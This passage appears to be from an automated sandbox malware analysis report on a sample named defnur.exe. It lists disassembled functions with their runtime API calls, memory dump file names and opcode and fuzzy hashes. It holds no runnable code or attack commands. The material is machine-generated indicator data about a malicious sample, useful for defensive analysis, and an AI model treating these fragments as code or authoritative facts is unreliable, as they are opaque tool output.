                                                                                                                                                                                                                                                    • _free.LIBCMT ref: 00E04645
                                                                                                                                                                                                                                                    • _free.LIBCMT ref: 00E04656
                                                                                                                                                                                                                                                    • _free.LIBCMT ref: 00E04667
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000009.00000002.2389300866.0000000000DD1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00DD0000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000009.00000002.2389268559.0000000000DD0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000009.00000002.2389361077.0000000000E21000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000009.00000002.2389397591.0000000000E36000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000009.00000002.2389434516.0000000000E3D000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_9_2_dd0000_defnur.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: _free$ErrorFreeHeapLast
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 776569668-0
                                                                                                                                                                                                                                                    • Opcode ID: 5b4d7313c8858d465d7826b0178b0597a224b0db3280d2e0ea1f664259ef7110
                                                                                                                                                                                                                                                    • Instruction ID: 5cd56f0c0315c92a1d2ded461047d3aae49134e57b0bb144d82a3f47ff0ae83d
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 5b4d7313c8858d465d7826b0178b0597a224b0db3280d2e0ea1f664259ef7110
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 4CE04F718122289EDB212F17BC0A4863E61B798710300100AF49832233DBBA009E9FC2
                                                                                                                                                                                                                                                    Function 00E0338D Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 194COMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • __startOneArgErrorHandling.LIBCMT ref: 00E0341D
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000009.00000002.2389300866.0000000000DD1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00DD0000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000009.00000002.2389268559.0000000000DD0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000009.00000002.2389361077.0000000000E21000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000009.00000002.2389397591.0000000000E36000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000009.00000002.2389434516.0000000000E3D000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_9_2_dd0000_defnur.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: ErrorHandling__start
                                                                                                                                                                                                                                                    • String ID: pow
                                                                                                                                                                                                                                                    • API String ID: 3213639722-2276729525
                                                                                                                                                                                                                                                    • Opcode ID: 235565e9899c676d559bd6929be36eae36db3823849bbfe05b33571da28f5653
                                                                                                                                                                                                                                                    • Instruction ID: 5941639f62ea421b90f235effd9a359843017614a9fed759fa1d1d506d1dc5ea
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 235565e9899c676d559bd6929be36eae36db3823849bbfe05b33571da28f5653
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 1051A071A0910196CB227B24CE0137E6BE8EB40714F306D79E0E57A3F9EB748DD69A42
                                                                                                                                                                                                                                                    Function 00DDDB20 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 183COMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                      • Part of subcall function 00DF4550: std::locale::_Init.LIBCPMT ref: 00DF45E2
                                                                                                                                                                                                                                                    • std::ios_base::_Ios_base_dtor.LIBCPMT ref: 00DDDD18
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000009.00000002.2389300866.0000000000DD1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00DD0000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000009.00000002.2389268559.0000000000DD0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000009.00000002.2389361077.0000000000E21000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000009.00000002.2389397591.0000000000E36000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000009.00000002.2389434516.0000000000E3D000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_9_2_dd0000_defnur.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: InitIos_base_dtorstd::ios_base::_std::locale::_
                                                                                                                                                                                                                                                    • String ID: `$x
                                                                                                                                                                                                                                                    • API String ID: 3469404174-4135529956
                                                                                                                                                                                                                                                    • Opcode ID: 8696393e36a185340bfb2a6a7311566e70b12646c4310f8aa498a2a9c2f3e178
                                                                                                                                                                                                                                                    • Instruction ID: e352019a2eea3c0f296fb6f71fbe6d31c7d62d42322898804d95e0072e17288f
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 8696393e36a185340bfb2a6a7311566e70b12646c4310f8aa498a2a9c2f3e178
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 07714970A01258DFEF14DF68CD95BADBBB5FB04304F1486A9E409AB381D775AA44CF60
                                                                                                                                                                                                                                                    Function 00E03A92 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 123COMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000009.00000002.2389300866.0000000000DD1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00DD0000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000009.00000002.2389268559.0000000000DD0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000009.00000002.2389361077.0000000000E21000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000009.00000002.2389397591.0000000000E36000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000009.00000002.2389434516.0000000000E3D000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_9_2_dd0000_defnur.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID: C:\Users\user\AppData\Local\Temp\fc9e0aaab7\defnur.exe
                                                                                                                                                                                                                                                    • API String ID: 0-1814373646
                                                                                                                                                                                                                                                    • Opcode ID: a5c1a2f39b856eeef24afcfa9f25c0eff6bdb6481328ef56050ef47bb8834247
                                                                                                                                                                                                                                                    • Instruction ID: 74bb1fef827cbad5f86c6a876c7673883285debf8bc41ab6f6e5c91f1fb565bb
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: a5c1a2f39b856eeef24afcfa9f25c0eff6bdb6481328ef56050ef47bb8834247
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 1E419771A00218AFDB219FA9DC869AEBBFCEB85314F101066F404F7291D7B09F84CB90
                                                                                                                                                                                                                                                    Function 00DFCFEC Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 112COMMONLIBRARYCODE
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • EncodePointer.KERNEL32(00000000,?,00000000,1FFFFFFF), ref: 00DFD011
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000009.00000002.2389300866.0000000000DD1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00DD0000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000009.00000002.2389268559.0000000000DD0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000009.00000002.2389361077.0000000000E21000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000009.00000002.2389397591.0000000000E36000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000009.00000002.2389434516.0000000000E3D000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_9_2_dd0000_defnur.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: EncodePointer
                                                                                                                                                                                                                                                    • String ID: MOC$RCC
                                                                                                                                                                                                                                                    • API String ID: 2118026453-2084237596
                                                                                                                                                                                                                                                    • Opcode ID: 87fe1f5501f63b305999d611336c0a10bc7be69ee05fa4e039c750dd0c349773
                                                                                                                                                                                                                                                    • Instruction ID: 0bb978397977e9434bb17458ba990716f10adaeed6d3713575d0eb06fd00478c
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 87fe1f5501f63b305999d611336c0a10bc7be69ee05fa4e039c750dd0c349773
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: B3413A7290020DAFCF15DF98CD82AEEBBB6FF48304F1A8059FA0467251D7359951DB61
                                                                                                                                                                                                                                                    Function 00E0FA33 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 99COMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                      • Part of subcall function 00E0F7DD: GetOEMCP.KERNEL32(00000000,00E0FA4E,?,?,00DFEFF2,00DFEFF2,?), ref: 00E0F808
                                                                                                                                                                                                                                                    • _free.LIBCMT ref: 00E0FAAB
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000009.00000002.2389300866.0000000000DD1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00DD0000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000009.00000002.2389268559.0000000000DD0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000009.00000002.2389361077.0000000000E21000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000009.00000002.2389397591.0000000000E36000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000009.00000002.2389434516.0000000000E3D000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_9_2_dd0000_defnur.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: _free
                                                                                                                                                                                                                                                    • String ID: hf
                                                                                                                                                                                                                                                    • API String ID: 269201875-85887381
                                                                                                                                                                                                                                                    • Opcode ID: e51d030522757704d4f87857a183a338c86fc7ae4b9c386bbc13ecc923fa33c1
                                                                                                                                                                                                                                                    • Instruction ID: 4d12e3d968f3ba57283cfa6ec3dfd3121df1e1a31b69137be13dd352efc816fa
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: e51d030522757704d4f87857a183a338c86fc7ae4b9c386bbc13ecc923fa33c1
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 36319E72900209AFDB21DF68D881A9A77F4FF44314F15406AF914BB2A1EB329DA5CF60
                                                                                                                                                                                                                                                    Function 00DF7D3A Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 73COMMONLIBRARYCODE
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • __alloca_probe_16.LIBCMT ref: 00DF7DC2
                                                                                                                                                                                                                                                    • RaiseException.KERNEL32(?,?,?,?), ref: 00DF7DE7
                                                                                                                                                                                                                                                      • Part of subcall function 00DFAF76: RaiseException.KERNEL32(E06D7363,00000001,00000003,00E339C4,?,?,?,00E339C4), ref: 00DFAFD6
                                                                                                                                                                                                                                                      • Part of subcall function 00DFDE94: IsProcessorFeaturePresent.KERNEL32(00000017,00E06DAC,?,?,00DFE157,?,?,?,?,00DFEFF2,?), ref: 00DFDEB0
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000009.00000002.2389300866.0000000000DD1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00DD0000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000009.00000002.2389268559.0000000000DD0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000009.00000002.2389361077.0000000000E21000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000009.00000002.2389397591.0000000000E36000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000009.00000002.2389434516.0000000000E3D000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_9_2_dd0000_defnur.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: ExceptionRaise$FeaturePresentProcessor__alloca_probe_16
                                                                                                                                                                                                                                                    • String ID: csm
                                                                                                                                                                                                                                                    • API String ID: 1924019822-1018135373
                                                                                                                                                                                                                                                    • Opcode ID: b715cc72228f2ec1bff730af5d5a5372d78c8f946cf3b30d479412c06b2d4d6d
                                                                                                                                                                                                                                                    • Instruction ID: 7daf1c913f067e14187f1ff97f5ce447ad2dddd70c5df22175554655594bb067
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: b715cc72228f2ec1bff730af5d5a5372d78c8f946cf3b30d479412c06b2d4d6d
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 48216B31D0521CEBCF24DF98CC45AFDB7B5EF44710F9A8009E609AB250DA30AD45CBA1
                                                                                                                                                                                                                                                    Function 00E00CF5 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 66COMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000009.00000002.2389300866.0000000000DD1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00DD0000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000009.00000002.2389268559.0000000000DD0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000009.00000002.2389361077.0000000000E21000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000009.00000002.2389397591.0000000000E36000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000009.00000002.2389434516.0000000000E3D000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_9_2_dd0000_defnur.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: _free
                                                                                                                                                                                                                                                    • String ID: 0b
                                                                                                                                                                                                                                                    • API String ID: 269201875-2183109320
                                                                                                                                                                                                                                                    • Opcode ID: dcbe9a207cc4cbfa3c29838990df6f45999c45d5717487ad9af6eb2c9d155fa0
                                                                                                                                                                                                                                                    • Instruction ID: 9db0c7447d72f47893b4b0fe702fb5a6d9fb49839ada563f89878f3dc2454cd0
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: dcbe9a207cc4cbfa3c29838990df6f45999c45d5717487ad9af6eb2c9d155fa0
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: DB110B72E003045FDB209B7ABC597563BD4A7A0734F142226F564FB1E6D7B0E8C54791
                                                                                                                                                                                                                                                    Function 00DD44C0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 65COMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • std::_Lockit::_Lockit.LIBCPMT ref: 00DD44EB
                                                                                                                                                                                                                                                    • std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 00DD453A
                                                                                                                                                                                                                                                      • Part of subcall function 00DF886E: _Yarn.LIBCPMT ref: 00DF888D
                                                                                                                                                                                                                                                      • Part of subcall function 00DF886E: _Yarn.LIBCPMT ref: 00DF88B1
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000009.00000002.2389300866.0000000000DD1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00DD0000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000009.00000002.2389268559.0000000000DD0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000009.00000002.2389361077.0000000000E21000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000009.00000002.2389397591.0000000000E36000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000009.00000002.2389434516.0000000000E3D000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_9_2_dd0000_defnur.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: Yarnstd::_$Locinfo::_Locinfo_ctorLockitLockit::_
                                                                                                                                                                                                                                                    • String ID: bad locale name
                                                                                                                                                                                                                                                    • API String ID: 1908188788-1405518554
                                                                                                                                                                                                                                                    • Opcode ID: 89ccf48f01df5fe92313414d54f4be7e86c5314399631092dfd2f8865ba02813
                                                                                                                                                                                                                                                    • Instruction ID: 2741e3fa906c9882a70354c3f2378cc4fa950f4bfeaa844f211cc3426dd2b1a4
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 89ccf48f01df5fe92313414d54f4be7e86c5314399631092dfd2f8865ba02813
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 9011E071504B849FD320CF69C90075BBBE8EF18710F008A1EE88AD3B81E774A904CBA5
                                                                                                                                                                                                                                                    Function 00E113EA Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 50COMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000009.00000002.2389300866.0000000000DD1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00DD0000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000009.00000002.2389268559.0000000000DD0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000009.00000002.2389361077.0000000000E21000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000009.00000002.2389397591.0000000000E36000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000009.00000002.2389434516.0000000000E3D000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_9_2_dd0000_defnur.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: _free
                                                                                                                                                                                                                                                    • String ID: pN
                                                                                                                                                                                                                                                    • API String ID: 269201875-805884423
                                                                                                                                                                                                                                                    • Opcode ID: 08c24ecec40421748900fe67193526eb8dee99bf23c21a451f0650d2633f3b21
                                                                                                                                                                                                                                                    • Instruction ID: 6827e98655e3cf0c6fe64773287e5e8b904a987083fb53d9390c3ddc02747c11
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 08c24ecec40421748900fe67193526eb8dee99bf23c21a451f0650d2633f3b21
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 18F0C8334183206AE7106A61BC42BDB77D9EB81B74F2510BAFB1C7A183DE6218C146F6